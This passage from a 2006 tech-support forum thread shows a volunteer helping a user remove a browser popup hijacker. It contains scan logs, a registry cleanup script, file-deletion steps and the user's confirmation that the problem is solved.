Microsoft Corporation 23/08/2001 12:00:00 66048 C:\WINDOWS\SYSTEM32\access.cpl
Microsoft Corporation 23/08/2001 12:00:00 558592 C:\WINDOWS\SYSTEM32\appwiz.cpl
Sonic Solutions 11/08/2005 02:01:00 1134592 C:\WINDOWS\SYSTEM32\CMDVDPak.cpl
Microsoft Corporation 23/08/2001 12:00:00 130048 C:\WINDOWS\SYSTEM32\desk.cpl
Microsoft Corporation 23/08/2001 12:00:00 150016 C:\WINDOWS\SYSTEM32\hdwwiz.cpl
Microsoft Corporation 23/08/2001 12:00:00 294912 C:\WINDOWS\SYSTEM32\inetcpl.cpl
Microsoft Corporation 23/08/2001 12:00:00 119808 C:\WINDOWS\SYSTEM32\intl.cpl
InstallShield Software Corporation27/07/2004 18:50:48 73728 C:\WINDOWS\SYSTEM32\ISUSPM.cpl
Microsoft Corporation 29/08/2002 03:41:00 208896 C:\WINDOWS\SYSTEM32\joy.cpl
Sun Microsystems, Inc. 10/11/2005 13:03:50 49265 C:\WINDOWS\SYSTEM32\jpicpl32.cpl
Microsoft Corporation 23/08/2001 12:00:00 187904 C:\WINDOWS\SYSTEM32\main.cpl
AvantGo, Inc. 06/12/2004 13:07:08 69632 C:\WINDOWS\SYSTEM32\mbllnk.cpl
Microsoft Corporation 23/08/2001 12:00:00 559616 C:\WINDOWS\SYSTEM32\mmsys.cpl
Microsoft Corporation 23/08/2001 12:00:00 35840 C:\WINDOWS\SYSTEM32\ncpa.cpl
Microsoft Corporation 23/08/2001 12:00:00 256000 C:\WINDOWS\SYSTEM32\nusrmgr.cpl
Microsoft Corporation 23/08/2001 12:00:00 36864 C:\WINDOWS\SYSTEM32\nwc.cpl
Microsoft Corporation 23/08/2001 12:00:00 36864 C:\WINDOWS\SYSTEM32\odbccp32.cpl
Microsoft Corporation 23/08/2001 12:00:00 109056 C:\WINDOWS\SYSTEM32\powercfg.cpl
SmartLink 05/05/2002 17:18:34 339968 C:\WINDOWS\SYSTEM32\slcpappl.cpl
Microsoft Corporation 23/08/2001 12:00:00 270848 C:\WINDOWS\SYSTEM32\sysdm.cpl
Microsoft Corporation 23/08/2001 12:00:00 28160 C:\WINDOWS\SYSTEM32\telephon.cpl
Microsoft Corporation 23/08/2001 12:00:00 90112 C:\WINDOWS\SYSTEM32\timedate.cpl
Microsoft Corporation 26/05/2005 03:16:30 174360 C:\WINDOWS\SYSTEM32\wuaucpl.cpl
Microsoft Corporation 23/08/2001 12:00:00 66048 C:\WINDOWS\SYSTEM32\dllcache\access.cpl
Microsoft Corporation 23/08/2001 12:00:00 558592 C:\WINDOWS\SYSTEM32\dllcache\appwiz.cpl
Microsoft Corporation 23/08/2001 12:00:00 130048 C:\WINDOWS\SYSTEM32\dllcache\desk.cpl
Microsoft Corporation 23/08/2001 12:00:00 150016 C:\WINDOWS\SYSTEM32\dllcache\hdwwiz.cpl
Microsoft Corporation 23/08/2001 12:00:00 294912 C:\WINDOWS\SYSTEM32\dllcache\inetcpl.cpl
Microsoft Corporation 23/08/2001 12:00:00 119808 C:\WINDOWS\SYSTEM32\dllcache\intl.cpl
Microsoft Corporation 29/08/2002 03:41:00 208896 C:\WINDOWS\SYSTEM32\dllcache\joy.cpl
Microsoft Corporation 23/08/2001 12:00:00 187904 C:\WINDOWS\SYSTEM32\dllcache\main.cpl
Microsoft Corporation 23/08/2001 12:00:00 559616 C:\WINDOWS\SYSTEM32\dllcache\mmsys.cpl
Microsoft Corporation 23/08/2001 12:00:00 35840 C:\WINDOWS\SYSTEM32\dllcache\ncpa.cpl
Microsoft Corporation 23/08/2001 12:00:00 256000 C:\WINDOWS\SYSTEM32\dllcache\nusrmgr.cpl
Microsoft Corporation 23/08/2001 12:00:00 36864 C:\WINDOWS\SYSTEM32\dllcache\nwc.cpl
Microsoft Corporation 23/08/2001 12:00:00 36864 C:\WINDOWS\SYSTEM32\dllcache\odbccp32.cpl
Microsoft Corporation 23/08/2001 12:00:00 109056 C:\WINDOWS\SYSTEM32\dllcache\powercfg.cpl
Microsoft Corporation 23/08/2001 12:00:00 147456 C:\WINDOWS\SYSTEM32\dllcache\sapi.cpl
Microsoft Corporation 23/08/2001 12:00:00 270848 C:\WINDOWS\SYSTEM32\dllcache\sysdm.cpl
Microsoft Corporation 23/08/2001 12:00:00 28160 C:\WINDOWS\SYSTEM32\dllcache\telephon.cpl
Microsoft Corporation 23/08/2001 12:00:00 90112 C:\WINDOWS\SYSTEM32\dllcache\timedate.cpl

Checking Selected Startup Folders

Checking files in %ALLUSERSPROFILE%\Startup folder...
20/11/2005 22:07:28 1766 C:\Documents and Settings\All Users.WINDOWS\Start Menu\Programs\Startup\Adobe Reader Speed Launch.lnk
15/09/2005 19:51:18 2085 C:\Documents and Settings\All Users.WINDOWS\Start Menu\Programs\Startup\Belkin 802.11g Wireless PCI Card Configuration Utility.lnk
15/09/2005 18:10:50 HS 84 C:\Documents and Settings\All Users.WINDOWS\Start Menu\Programs\Startup\desktop.ini
15/09/2005 19:29:02 1720 C:\Documents and Settings\All Users.WINDOWS\Start Menu\Programs\Startup\Philips ThumbCam Monitor.lnk

Checking files in %ALLUSERSPROFILE%\Application Data folder...
15/09/2005 18:54:18 HS 62 C:\Documents and Settings\All Users.WINDOWS\Application Data\desktop.ini
21/01/2006 16:20:20 7 C:\Documents and Settings\All Users.WINDOWS\Application Data\DragToDiscUserNameE.txt

Checking files in %USERPROFILE%\Startup folder...
15/09/2005 18:10:50 HS 84 C:\Documents and Settings\Administrator.BOATPEOPLE\Start Menu\Programs\Startup\desktop.ini

Checking files in %USERPROFILE%\Application Data folder...
15/09/2005 18:54:18 HS 62 C:\Documents and Settings\Administrator.BOATPEOPLE\Application Data\desktop.ini

Checking Selected Registry Keys

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]

[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers]
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Offline Files
{750fdf0e-2a26-11d1-a3ea-080036587f03} = %SystemRoot%\System32\cscui.dll
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Open With
{09799AFB-AD67-11d1-ABCD-00C04FC30936} = %SystemRoot%\system32\SHELL32.dll
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Open With EncryptionMenu
{A470F8CF-A1E8-4f65-8335-227475AA5C46} = %SystemRoot%\system32\SHELL32.dll
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\RXDCExtSvr
{0FB82570-BB2D-23D3-8D3B-AC2F34F1FA3C} = C:\Program Files\Roxio\Easy Media Creator 8\Virtual Drive\DC_ShellExt.dll
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\{48F45200-91E6-11CE-8A4F-0080C81A28D4}
= C:\Program Files\Trend Micro\Internet Security 2005\Tmdshell.dll
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}
Start Menu Pin = %SystemRoot%\system32\SHELL32.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers]
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\RXDCExtSvr
{0FB82570-BB2D-23D3-8D3B-AC2F34F1FA3C} = C:\Program Files\Roxio\Easy Media Creator 8\Virtual Drive\DC_ShellExt.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\{48F45200-91E6-11CE-8A4F-0080C81A28D4}
= C:\Program Files\Trend Micro\Internet Security 2005\Tmdshell.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers]
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EncryptionMenu
{A470F8CF-A1E8-4f65-8335-227475AA5C46} = %SystemRoot%\system32\SHELL32.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\Offline Files
{750fdf0e-2a26-11d1-a3ea-080036587f03} = %SystemRoot%\System32\cscui.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\Sharing
{f81e9010-6ea4-11ce-a7ff-00aa003ca9f6} = ntshrui.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shellex\ColumnHandlers]
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shellex\ColumnHandlers\{0D2E74C4-3C34-11d2-A27E-00C04FC30871}
= %SystemRoot%\system32\SHELL32.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shellex\ColumnHandlers\{24F14F01-7B1C-11d1-838f-0000F80461CF}
= %SystemRoot%\system32\SHELL32.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shellex\ColumnHandlers\{24F14F02-7B1C-11d1-838f-0000F80461CF}
= %SystemRoot%\system32\SHELL32.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shellex\ColumnHandlers\{66742402-F9B9-11D1-A202-0000F81FEDEE}
= %SystemRoot%\system32\SHELL32.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shellex\ColumnHandlers\{F9DB5320-233E-11D1-9F84-707F02C10627}
= C:\Program Files\Adobe\Acrobat 7.0\ActiveX\PDFShell.dll

[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}
AcroIEHlprObj Class = C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}
SSVHelper Class = C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AA58ED58-01DD-4d91-8333-CF10577473F7}
Google Toolbar Helper = c:\program files\google\googletoolbar1.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Explorer Bars]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Explorer Bars\{4528BBE0-4E08-11D5-AD55-00010333D0AD}
=
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Explorer Bars\{4D5C8C25-D075-11d0-B416-00C04FB90376}
&Tip of the Day = %SystemRoot%\System32\shdocvw.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ToolBar]
{2318C2B1-4965-11d4-9B18-009027A5CD4F} = &Google : c:\program files\google\googletoolbar1.dll
{8E718888-423F-11D2-876E-00A0C9082467} = &Radio : C:\WINDOWS\System32\msdxm.ocx

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}
MenuText = Sun Java Console : C:\Program Files\Java\jre1.5.0_06\bin\npjpi150_06.dll

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Explorer Bars]
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Explorer Bars\{32683183-48a0-441b-a342-7c2a440a9478}
Media Band = %SystemRoot%\System32\browseui.dll

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
AtiPTA atiptaxx.exe
pccguide.exe "C:\Program Files\Trend Micro\Internet Security 2005\pccguide.exe"
AnyDVD C:\Program Files\SlySoft\AnyDVD\AnyDVD.exe
SM1BG C:\WINDOWS\SM1BG.EXE
Google Desktop Search "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startup
QuickTime Task "C:\Program Files\QuickTime\qttask.exe" -atboottime
RoxioDragToDisc "C:\Program Files\Roxio\Easy Media Creator 8\Drag to Disc\DrgToDsc.exe"
RoxWatchTray "C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxWatchTray.exe"
SunJavaUpdateSched C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
CTFMON.EXE C:\WINDOWS\System32\CTFMON.EXE

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\load]

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\run]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies]

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
NoRun 0
NoCDBurning 1


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum
{BDEADF00-C265-11D0-BCED-00A0C90AB50F} = C:\PROGRA~1\COMMON~1\MICROS~1\WEBFOL~1\MSONSEXT.DLL
{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} =
{0DF44EAA-FF21-4412-828E-260A8728E7F1} =


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
dontdisplaylastusername 0
legalnoticecaption
legalnoticetext
shutdownwithoutlogon 1
undockwithoutlogon 1


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies]

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
NoDriveTypeAutoRun 145


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
PostBootReminder {7849596a-48ea-486e-8937-a2a3009f31a9} = %SystemRoot%\system32\SHELL32.dll
CDBurn {fbeb8a05-beee-4442-804e-409d6c4515e9} = %SystemRoot%\system32\SHELL32.dll
WebCheck {E6FB5E20-DE35-11CF-9C87-00AA005127ED} = %SystemRoot%\System32\webcheck.dll
SysTray {35CEC8A3-2BE6-11D2-8773-92E220524153} = C:\WINDOWS\System32\stobject.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
UserInit = C:\WINDOWS\system32\userinit.exe,
Shell = explorer.exe
System =

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt32chain
= crypt32.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptnet
= cryptnet.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cscdll
= cscdll.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ScCertProp
= wlnotify.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Schedule
= wlnotify.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\sclgntfy
= sclgntfy.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SensLogn
= WlNotify.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\termsrv
= wlnotify.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\wlballoon
= wlnotify.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Your Image File Name Here without a path
Debugger = ntsd -d

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
AppInit_DLLs


Scan Complete
WinPFind v1.4.1 - Log file written to "WinPFind.Txt" in the WinPFind folder.
Scan completed on 21/01/2006 16:45:13

#7 boatpeople

boatpeople
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:03:41 AM

Posted 21 January 2006 - 12:40 PM

Temporary fix also fails to stop popups, have just had popup for site http://nghenhacso.net.ms/ & http://ie7.net.ms/ both Vietnamese based. I guess this indicates the driver for popups is not java script based.

#8 Daisuke

Daisuke

    Cleaner on Duty


  • Members
  • 5,575 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Romania
  • Local time:10:41 PM

Posted 21 January 2006 - 01:10 PM

Give me some time to investigate this.
Everyday is virus day. Do you know where your recovery CDs are ?
Did you create them yet ?

Posted Image

#9 Daisuke

Daisuke

    Cleaner on Duty


  • Members
  • 5,575 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Romania
  • Local time:10:41 PM

Posted 21 January 2006 - 02:46 PM

The fix worked for me, it should work for you also.

Please print or copy these instructions because you are not able to access the Internet in SafeMode.

Download System Security Suite here:
System Security Suite Download. Unzip it to your desktop. Install the program. Don't use it yet.

REBOOT into SafeMode by tapping F8 key repeatedly at bootup: Starting your computer in Safe mode

Run this registry script:
Copy the contents of the Quote box to Notepad, and save in a location of your choice as fix.reg (make sure to save as type: "All Files")
Doubleclick fix.reg, and answer 'yes' when prompted to add its contents to the Registry.

[-HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1]
[-HKEY_CURRENT_USER\Software\yahoo\pager\View]
[-HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs]



Search for these files and delete them if present:
c:\Google.exe <-- this file
c:\Google.html <-- this file
C:\WINDOWS\inf\systemboot.js <-- this file
c:\Documents and Settings\[insert your current user here]\Application Data\Microsoft\HTML Help\hh.dat <-- this file

With all windows and browsers closed.
Clean out temporary and Temporary Internet Files.
A. Open System Security Suite.
B. In the Items to Clear tab thick:
- Internet Explorer (left pane): Cookies & Temporary files
- My Computer (right pane): Temporary files & Recycle Bin
Press the Clear Selected Items button.
Close the program.

REBOOT normally.


It is essential that you update your windows as the infection may reoccur.
Go to http://www.windowsupdate.com and if it asks to install software, let it. Then click on the Scan link and let it do its thing. When its done you will see on your left a section called critical updates. Click on that section and install everything that you can. When it prompts you to reboot, do so. Then repeat this process again until there are no more critical updates listed.

Install Service Pack 1 and ALL critical updates.

After the installation of the last update make sure you REBOOT the computer.

Run HijackThis! again and post a new log please.
Tell me please if the problem is solved.

Edited by Daisuke, 21 January 2006 - 02:47 PM.

Everyday is virus day. Do you know where your recovery CDs are ?
Did you create them yet ?

Posted Image

#10 boatpeople

boatpeople
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:03:41 AM

Posted 21 January 2006 - 05:18 PM

I had trouble following instructions. When it came to double click on fix.reg I got an error message:

"Cannot import ...fix.reg: The specified file is not a registry script. You can only import binary registry files from within the registry editor"

Is there something obvious where I'm not following?

The good news (I think) was that I was able to use regedit to reset registry values where indicated by fix.reg and I found there were obvious alterations by the hijacker. Will monitor situation.

#11 Daisuke

Daisuke

    Cleaner on Duty


  • Members
  • 5,575 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Romania
  • Local time:10:41 PM

Posted 21 January 2006 - 05:20 PM

Oh, sorry. This one is OK.

REGEDIT4

[-HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1]
[-HKEY_CURRENT_USER\Software\yahoo\pager\View]
[-HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs]


Everyday is virus day. Do you know where your recovery CDs are ?
Did you create them yet ?

Posted Image

#12 boatpeople

boatpeople
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:03:41 AM

Posted 22 January 2006 - 08:32 AM

Hi Daisuke - no unsolicited websites since implementing the fix... I believe the problem is solved :thumbsup:

It was so easy when you know where to look! I guess all the skill comes from diagnosing the logs. Thank you so much for your help. As requested, I have posted a final hijack log below.

Logfile of HijackThis v1.99.1
Scan saved at 11:06:02, on 22/01/2006
Platform: Windows XP (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe
C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxWatch.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\slserv.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\atiptaxx.exe
C:\Program Files\Trend Micro\Internet Security 2005\pccguide.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe
C:\Program Files\SlySoft\AnyDVD\AnyDVD.exe
C:\WINDOWS\SM1BG.EXE
C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\Roxio\Easy Media Creator 8\Drag to Disc\DrgToDsc.exe
C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxWatchTray.exe
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
C:\Program Files\Skype\Phone\Skype.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe
C:\Program Files\Plaxo\2.6.2.7\PlaxoHelper.exe
C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE
C:\Program Files\Belkin\Belkin 802.11g Wireless PCI Card Configuration Utility\utility.exe
C:\Program Files\Philips Photo Manager\Philips ThumbCam Monitor.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopIndex.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopDisplay.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopCrawl.exe
C:\Program Files\Common Files\Roxio Shared\SharedCOM8\CPSHelpRunner.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\TmPfw.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopOE.exe
C:\Program Files\HijackThis\HijackThis.exe

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [AtiPTA] atiptaxx.exe
O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\Internet Security 2005\pccguide.exe"
O4 - HKLM\..\Run: [AnyDVD] C:\Program Files\SlySoft\AnyDVD\AnyDVD.exe
O4 - HKLM\..\Run: [SM1BG] C:\WINDOWS\SM1BG.EXE
O4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startup
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [RoxioDragToDisc] "C:\Program Files\Roxio\Easy Media Creator 8\Drag to Disc\DrgToDsc.exe"
O4 - HKLM\..\Run: [RoxWatchTray] "C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxWatchTray.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [PlaxoUpdate] C:\Program Files\Plaxo\2.6.2.7\PlaxoHelper.exe -a
O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE"
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Belkin 802.11g Wireless PCI Card Configuration Utility.lnk = C:\Program Files\Belkin\Belkin 802.11g Wireless PCI Card Configuration Utility\utility.exe
O4 - Global Startup: Philips ThumbCam Monitor.lnk = C:\Program Files\Philips Photo Manager\Philips ThumbCam Monitor.exe
O8 - Extra context menu item: &Google Search - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsearch.html
O8 - Extra context menu item: &Translate English Word - res://C:\Program Files\Google\GoogleToolbar1.dll/cmwordtrans.html
O8 - Extra context menu item: Backward Links - res://C:\Program Files\Google\GoogleToolbar1.dll/cmbacklinks.html
O8 - Extra context menu item: Cached Snapshot of Page - res://C:\Program Files\Google\GoogleToolbar1.dll/cmcache.html
O8 - Extra context menu item: Similar Pages - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsimilar.html
O8 - Extra context menu item: Translate Page into English - res://C:\Program Files\Google\GoogleToolbar1.dll/cmtrans.html
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/...b?1126814900650
O16 - DPF: {6E5A37BF-FD42-463A-877C-4EB7002E68AE} (Housecall ActiveX 6.5) - http://eu-housecall.trendmicro-europe.com/...ivex/hcImpl.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{0326DFAD-BC5A-4A9C-BB52-F7473E358E65}: NameServer = 192.168.1.1
O17 - HKLM\System\CS1\Services\Tcpip\..\{0326DFAD-BC5A-4A9C-BB52-F7473E358E65}: NameServer = 192.168.1.1
O17 - HKLM\System\CS2\Services\Tcpip\..\{0326DFAD-BC5A-4A9C-BB52-F7473E358E65}: NameServer = 192.168.1.1
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: Trend Micro Central Control Component (PcCtlCom) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe
O23 - Service: LiveShare P2P Server (RoxLiveShare) - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxLiveShare.exe
O23 - Service: RoxMediaDB - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxMediaDB.exe
O23 - Service: RoxUpnpRenderer (RoxUPnPRenderer) - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\SharedCom\RoxUpnpRenderer.exe
O23 - Service: RoxUpnpServer - Sonic Solutions - C:\Program Files\Roxio\Easy Media Creator 8\Digital Home\RoxUpnpServer.exe
O23 - Service: Roxio Hard Drive Watcher (RoxWatch) - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxWatch.exe
O23 - Service: SmartLinkService (SLService) - - C:\WINDOWS\SYSTEM32\slserv.exe
O23 - Service: Trend Micro Real-time Service (Tmntsrv) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe
O23 - Service: Trend Micro Personal Firewall (TmPfw) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\TmPfw.exe
O23 - Service: Trend Micro Proxy Service (tmproxy) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe

#13 Daisuke

Daisuke

    Cleaner on Duty


  • Members
  • 5,575 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Romania
  • Local time:10:41 PM
